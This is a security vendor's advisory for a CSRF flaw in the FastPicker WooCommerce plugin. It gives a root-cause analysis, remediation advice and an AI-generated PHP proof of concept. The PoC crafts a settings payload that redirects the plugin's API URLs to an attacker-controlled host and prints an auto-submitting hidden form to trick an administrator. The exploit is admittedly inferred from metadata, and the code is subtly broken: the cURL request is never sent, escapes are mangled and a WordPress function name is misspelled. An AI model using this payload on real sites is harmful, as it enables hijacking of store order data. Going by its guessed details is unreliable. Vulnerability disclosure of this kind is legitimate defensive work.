Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 10, 2026

CVE-2026-8904: FastPicker, an order picker and order management system (oms) for WooCommerce on steroids <= 1.0.2 Cross-Site Request Forgery via Settings Save PoC, Patch Analysis & Rule

CVE ID CVE-2026-8904
Plugin fastpicker
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.0.2
Patched Version
Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8904 (metadata-based): This vulnerability is a Cross-Site Request Forgery (CSRF) in the FastPicker plugin for WordPress, affecting versions up to and including 1.0.2. The plugin provides order picking and order management system (OMS) functionality for WooCommerce. An unauthenticated attacker can trick a site administrator into modifying plugin settings, including toggling webhook integration and changing API URLs for FastPicker and KDZ services. The CVSS score is 4.3 (Medium) due to the requirement for user interaction and the limited scope of modification to settings.

Root Cause: Based on the CWE classification (CWE-352: Cross-Site Request Forgery) and the description, the likely root cause is the absence of nonce validation in the settingsPage function. In WordPress plugins, administrative actions that modify settings typically require a nonce check to ensure the request was intentionally made by an authenticated admin. Without this check, an attacker can forge requests that appear legitimate to the server, as the browser automatically sends the admin’s session cookies. This analysis is inferred from the CWE and description; no source code diff confirms the exact implementation.

Exploitation: The attack exploits the plugin’s settings submission endpoint, likely accessed via /wp-admin/admin-ajax.php with a custom action hook such as fastpicker_save_settings. The attacker crafts a malicious HTML form or link that, when clicked by an authenticated administrator, submits a POST request to modify plugin settings. Parameters would include toggle flags for webhook integration (webhook_enabled=1) and new URL values for fastpicker_api_url and kdz_api_url pointing to attacker-controlled servers. The attacker must trick the admin into performing the action, typically through social engineering like embedding the request in a harmless-looking link.

Remediation: Based on the CWE-352 classification, the fix requires adding proper nonce validation to the settingsPage function. The plugin should generate a nonce using wp_create_nonce() when rendering the settings form, then verify it with wp_verify_nonce() when processing the submission. Additionally, implementing capability checks (current_user_cans) ensures only authorized administrators can modify settings. A complete patch would use check_admin_referer() for admin page submissions or check_ajax_referer() for AJAX handlers.

Impact: Successful exploitation allows an attacker to modify critical plugin settings without authentication. Changing API URLs could redirect order data to attacker-controlled endpoints, potentially intercepting sensitive WooCommerce order information. Toggling webhook integration could disrupt normal business operations by stopping order syncs or causing data loss. While direct data theft requires the admin to trigger the action, the consequences of modified settings can persist and affect all site visitors and orders processed through the plugin.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8904 - FastPicker <= 1.0.2 - Cross-Site Request Forgery via Settings Save

// Configuration - modify these values
$target_url = 'http://example.com'; // The WordPress site URL
$admin_url = $target_url . '/wp-admin/admin-ajax.php';
// Inferred AJAX action based on plugin slug
$ajax_action = 'fastpicker_save_settings';

// Craft the exploit payload
$payload = array(
    'action' => $ajax_action,
    // Toggle webhook integration to enabled
    'fastpicker_webhook_enabled' => '1',
    // Redirect API calls to attacker-controlled server
    'fastpicker_api_url' => 'https://attacker-controlled-server.com/api/fastpicker',
    'kdz_api_url' => 'https://attacker-controlled-server.com/api/kdz',
    // Any additional settings the plugin expects
    '_wp_http_referer' => '/wp-admin/admin.php?page=fastpicker-settings'
);

// Initialize cURL
$ch = curl_init($admin_url);
curl_setopt_array($ch, array(
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($payload),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));

// Execute the request (requires admin to trigger)
echo "[+] Crafted exploit payload for CVE-2026-8904n";
echo "[+] Target: $admin_urln";
echo "[+] Action: $ajax_actionn";
echo "[+] To exploit: host this script, then trick a logged-in WordPress admin into visiting this URL.n";
echo "[+] Alternatively, embed this as a form in a page the admin visits:nn";

echo '<form action="' . $admin_url . '" method="POST" id="exploit_form">' . "n";
foreach ($payload as $key => $value) {
    echo '  <input type="hidden" name="' . htmlspecialchars($key) . '" value="' . htmlspecialchars($value) . '">' . "n";
}
echo '  <input type="submit" value="Click here to continue">' . "n";
echo '</form>' . "n";
echo '<script>document.getElementById("exploit_form").submit();</script>' . "n";

curl_close($ch);

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School